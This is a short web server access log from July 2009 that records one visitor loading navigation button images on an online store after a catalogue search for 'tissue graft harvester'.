140.120.136.226 - - [06/Jul/2009:00:31:44 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20graft%20harvester" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
140.120.136.226 - - [06/Jul/2009:00:31:44 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20graft%20harvester" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
140.120.136.226 - - [06/Jul/2009:00:31:44 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20graft%20harvester" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
140.120.136.226 - - [06/Jul/2009:00:31:44 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20graft%20harvester" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
140.120.136.226 - - [06/Jul/2009:00:31:44 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20graft%20harvester" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
140.120.136.226 - - [06/Jul/2009:00:31:44 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20graft%20harvester" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
140.120.136.226 - - [06/Jul/2009:00:31:44 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20graft%20harvester" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
